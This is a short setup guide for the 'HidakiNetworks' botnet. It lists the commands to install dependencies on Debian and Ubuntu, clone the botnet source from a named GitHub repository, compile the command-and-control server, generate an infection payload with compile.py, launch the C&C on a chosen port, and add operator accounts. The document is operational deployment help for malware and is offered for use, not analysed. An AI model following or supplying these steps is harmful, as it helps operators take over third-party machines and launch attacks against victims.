this is a source of HidakiNetworks botnet
Tested on Debian 10, 11 and Ubuntu 18.04, 20.04
You must connect using raw connection type (putty)
Guide for Ubuntu/Debian
Installing dependencies
apt update && apt upgrade -y
apt install libbz2-1.0 libc6 liblzma5 perl zlib1g bzip2 python2 python -y
apt install nano screen gcc wget libzip-dev unzip git apache2 -y
Copy sources
You must put sources into the /root directory!!
cd /root
git clone https://github.com/shittzuka/hidaki.git
mv hidaki/* /root
rm README.md
Building sources
gcc server.c -o srv -pthread
python2 compile.py
You will get payload from compile.py
Starting cnc
chmod 777 *
screen ./srv 4258 1 <cnc port here>
For adding user, you must add a string in users/login.txt.
Example: root shittzukamygod admin 9999 3 10 99/99/9999
HidakiTeam - Created botnet
sh!ttzuka - Added sources on Git ;D